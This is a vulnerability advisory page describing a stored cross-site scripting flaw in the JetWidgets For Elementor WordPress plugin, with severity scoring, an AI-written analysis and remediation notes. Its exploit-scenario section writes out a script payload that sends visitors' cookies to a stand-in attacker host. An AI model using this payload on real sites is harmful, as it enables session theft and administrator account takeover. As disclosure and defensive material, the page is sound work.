Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Author-level credential requirement justifies PR:L; payload stored and served via web (AV:N, AC:L); scope changes to victim browsers (S:C); no availability impact observed.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 1.0.21. This is due to insufficient output escaping and missing server-side validation of the Animated Box widget's animation_effect setting before it is rendered inside an HTML class attribute. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored cross-site scripting in JetWidgets For Elementor (versions up to and including 1.0.21) allows authenticated WordPress users holding author-level access or higher to plant persistent JavaScript payloads by supplying unsanitized input to the Animated Box widget's animation_effect parameter, which is written directly into an HTML class attribute without output escaping or server-side validation. Any site visitor who loads an injected page triggers the payload, enabling session hijacking, credential theft, or administrative account takeover through privilege escalation within the victim's browser context. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a valid WordPress user account with at minimum author-level role on the target site; subscriber or lower roles cannot publish or edit pages and are therefore insufficient. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N scores 6.4, indicating low-complexity network exploitation requiring only low-privilege credentials (author-level WordPress role) with no attacker-side user interaction and a changed scope affecting victims' browsers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who holds or compromises a WordPress author account on a target site opens the Elementor editor, adds an Animated Box widget to a page, and enters a JavaScript payload such as '"><script>document.location='https://attacker.example/steal?c='+document.cookie</script> into the animation_effect field, then publishes the page. The payload is stored in the WordPress database without sanitization; any administrator or authenticated user who subsequently visits that page has the script execute in their browser, allowing the attacker to harvest session tokens and potentially create a rogue administrator account. … |
| Remediation | Update JetWidgets For Elementor to a version newer than 1.0.21 as soon as a patched release is confirmed available in the WordPress plugin repository; the fix is present in changeset 3583305 (https://plugins.trac.wordpress.org/changeset/3583305/jetwidgets-for-elementor) but a specific tagged release version was not independently confirmed from available data - verify via the plugin's changelog before deploying. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Jetwidgets For Elementor
View allThe JetWidgets For Elementor WordPress plugin before 1.0.14 does not validate and escape some of its shortcode attribute
The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘layout_type’ and
The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Animated Box widg
The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget button URL
The JetWidgets for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and inc
The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File upl
The “JetWidgets For Elementor” WordPress Plugin before 1.0.9 has several widgets that are vulnerable to stored Cross-Sit
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-40909
GHSA-xjv6-qwmr-5pf6